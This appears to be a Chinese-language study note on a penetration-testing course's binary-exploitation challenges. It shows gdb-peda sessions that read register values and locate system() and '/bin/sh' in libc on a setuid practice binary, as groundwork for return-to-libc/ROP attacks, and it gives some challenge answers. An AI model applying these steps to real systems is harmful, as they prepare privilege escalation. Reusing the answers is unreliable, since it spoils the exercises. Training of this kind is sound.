滲透測試進階技術-Binaries Range(1)

Binaries range

相關問題 (課程無提供環境，但已用別的靶機跟執行檔實驗):

3 (Challenge 13) What are last 6 hex characters of the hash of RootFlagTwo.txt on machine 172.25.120.220? (Hint: MD5 Hash)

這一題可以用本機的漏洞提權，不用真的寫ROP。

5 (Challenge 15) On the Target Machine 2 (172.25.120.220), analyze level-two binary file and find the value of the ss register at run time (include the 0x)? Ans: 0x2b

指令如下:

gdb file level-two binary

b main

info register

實際指令測試如下(使用的執行檔不同):

level0@rop:~$ gdb -q ./level0
Reading symbols from ./level0...(no debugging symbols found)...done.
gdb-peda$ b main
Breakpoint 1 at 0x8048257
gdb-peda$ start
[----------------------------------registers-----------------------------------]
EAX: 0xbffff79c --> 0xbffff8c8 ("XDG_SESSION_ID=1")
EBX: 0x0
ECX: 0x1
EDX: 0xbffff794 --> 0xbffff8b4 ("/home/level0/level0")
ESI: 0x80488e0 (<__libc_csu_fini>:      push   ebp)
EDI: 0xece99a02
EBP: 0xbffff6f8 --> 0xbffff768 --> 0x0
ESP: 0xbffff6f8 --> 0xbffff768 --> 0x0
EIP: 0x8048257 (<main+3>:       and    esp,0xfffffff0)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804824f <frame_dummy+63>:  jmp    0x80481a0 <register_tm_clones>
   0x8048254 <main>:    push   ebp
   0x8048255 <main+1>:  mov    ebp,esp
=> 0x8048257 <main+3>:  and    esp,0xfffffff0
   0x804825a <main+6>:  sub    esp,0x30
   0x804825d <main+9>:  mov    DWORD PTR [esp],0x80ab668
   0x8048264 <main+16>: call   0x8048f40 <puts>
   0x8048269 <main+21>: mov    DWORD PTR [esp],0x80ab680
[------------------------------------stack-------------------------------------]
0000| 0xbffff6f8 --> 0xbffff768 --> 0x0
0004| 0xbffff6fc --> 0x8048445 (<__libc_start_main+421>:        mov    DWORD PTR [esp],eax)
0008| 0xbffff700 --> 0x1
0012| 0xbffff704 --> 0xbffff794 --> 0xbffff8b4 ("/home/level0/level0")
0016| 0xbffff708 --> 0xbffff79c --> 0xbffff8c8 ("XDG_SESSION_ID=1")
0020| 0xbffff70c --> 0x0
0024| 0xbffff710 --> 0x0
0028| 0xbffff714 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x08048257 in main ()
gdb-peda$ info register
eax            0xbffff79c       0xbffff79c
ecx            0x1      0x1
edx            0xbffff794       0xbffff794
ebx            0x0      0x0
esp            0xbffff6f8       0xbffff6f8
ebp            0xbffff6f8       0xbffff6f8
esi            0x80488e0        0x80488e0
edi            0xece99a02       0xece99a02
eip            0x8048257        0x8048257 <main+3>
eflags         0x246    [ PF ZF IF ]
cs             0x73     0x73
ss             0x7b     0x7b
ds             0x7b     0x7b
es             0x7b     0x7b
fs             0x0      0x0
gs             0x33     0x33

6 (Challenge 16) On the Target Machine 2 (172.25.120.220), analyze level-two binary file and find the offset between the /bin/sh and the system() using dynamic analysis. (hint: /bin/sh is greater than system() - (include the 0x).

指令如下: (先進peda)

p system

find /bin/sh

實際操作如下:

level1@rop:~$ ls -l
total 20
-rw-rw-r-- 1 level0 level0    0 Mar  5  2015 bleh
-rw------- 1 level2 level2   53 Jan 20  2015 flag
-rwsr-xr-x 1 level2 level2 9235 Jan 20  2015 level1
-rw-rw-r-- 1 level1 level1   12 Apr 15 10:34 peda-session-level1.txt
level1@rop:~$ gdb -q ./level1
Reading symbols from ./level1...(no debugging symbols found)...done.
gdb-peda$ start
[----------------------------------registers-----------------------------------]
EAX: 0x1
EBX: 0xb7fd0000 --> 0x1aada8
ECX: 0xb192c7d7
EDX: 0xbffff724 --> 0xb7fd0000 --> 0x1aada8
ESI: 0x0
EDI: 0x0
EBP: 0xbffff6f8 --> 0x0
ESP: 0xbffff6f8 --> 0x0
EIP: 0x8048d1c (<main+3>:       and    esp,0xfffffff0)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048d18 <handle_conn+1027>:        ret
   0x8048d19 <main>:    push   ebp
   0x8048d1a <main+1>:  mov    ebp,esp
=> 0x8048d1c <main+3>:  and    esp,0xfffffff0
   0x8048d1f <main+6>:  sub    esp,0x30
   0x8048d22 <main+9>:  mov    DWORD PTR [esp+0x2c],0xffffffff
   0x8048d2a <main+17>: mov    DWORD PTR [esp+0x28],0xffffffff
   0x8048d32 <main+25>: mov    DWORD PTR [esp+0x8],0x0
[------------------------------------stack-------------------------------------]
0000| 0xbffff6f8 --> 0x0
0004| 0xbffff6fc --> 0xb7e3ea83 (<__libc_start_main+243>:       mov    DWORD PTR [esp],eax)
0008| 0xbffff700 --> 0x1
0012| 0xbffff704 --> 0xbffff794 --> 0xbffff8b4 ("/home/level1/level1")
0016| 0xbffff708 --> 0xbffff79c --> 0xbffff8c8 ("XDG_SESSION_ID=1")
0020| 0xbffff70c --> 0xb7feccea (add    ebx,0x12316)
0024| 0xbffff710 --> 0x1
0028| 0xbffff714 --> 0xbffff794 --> 0xbffff8b4 ("/home/level1/level1")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Temporary breakpoint 1, 0x08048d1c in main ()
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0xb7e65190 <system>
gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0xb7f86344 ("/bin/sh")

7 (Challenge 17) What is the address of /bin/bash within the executable file binaries-two (use the first address in the executable, not the stack) - (include the 0x)?

實際操作步驟可參考下面第2題。

相關問題 (有解的):

用到了ROP技術

2 (Challenge 12) What is the value in hex (include 0x) for the R8 register for BASH at run time on machine 172.25.120.210? Ans: 0x0

操作步驟(非真正答案，只是隨便找一個64bit執行檔實驗)

┌──(kali㉿kali)-[~]
└─$ gdb -q /bin/bash
Reading symbols from /bin/bash...
(No debugging symbols found in /bin/bash)
(gdb) b main
Breakpoint 1 at 0x2feb0
(gdb) start
Temporary breakpoint 2 at 0x2feb0
Starting program: /usr/bin/bash 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, 0x0000555555583eb0 in main ()
(gdb) info register
rax            0x555555583eb0      93824992427696
rbx            0x7fffffffdf88      140737488347016
rcx            0x55555567caf8      93824993446648
rdx            0x7fffffffdf98      140737488347032
rsi            0x7fffffffdf88      140737488347016
rdi            0x1                 1
rbp            0x1                 0x1
rsp            0x7fffffffde78      0x7fffffffde78
r8             0x0                 0
r9             0x7ffff7fcf6a0      140737353938592
r10            0x7ffff7fcb878      140737353922680
r11            0x7ffff7fe18c0      140737354012864
r12            0x0                 0
r13            0x7fffffffdf98      140737488347032
r14            0x55555567caf8      93824993446648
r15            0x7ffff7ffd020      140737354125344
rip            0x555555583eb0      0x555555583eb0 <main>
eflags         0x246               [ PF ZF IF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0

4 (Challenge 14) What are the last 6 hex characters of the hash of RootFlag210.txt file on machine 172.25.120.210? (Hint: MD5 Hash)